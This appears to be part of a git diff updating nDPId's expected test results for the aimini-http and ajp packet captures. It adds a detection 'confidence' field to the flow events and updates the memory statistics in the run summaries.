 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","total-events-serialized":26}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 139/133
@@ -32,10 +32,10 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603010 bytes
-~~ total memory freed........: 4603010 bytes
-~~ total allocations/frees...: 99707/99707
+~~ total memory allocated....: 4686979 bytes
+~~ total memory freed........: 4686979 bytes
+~~ total allocations/frees...: 101297/101297
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 932 chars
-~~ json string avg len.......: 619 chars
+~~ json string max len.......: 958 chars
+~~ json string avg len.......: 632 chars
diff --git a/test/results/ajp.pcap.out b/test/results/ajp.pcap.out
index f2191de6d..3e0092a00 100644
--- a/test/results/ajp.pcap.out
+++ b/test/results/ajp.pcap.out
@@ -5,7 +5,7 @@
 00399{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
 00180{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00399{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
 00180{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60}
 00387{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="}
@@ -22,7 +22,7 @@
 00400{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
 00181{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00400{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
 00181{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60}
 00388{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="}
@@ -33,8 +33,8 @@
 00182{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":878}
 00388{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="}
 00181{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
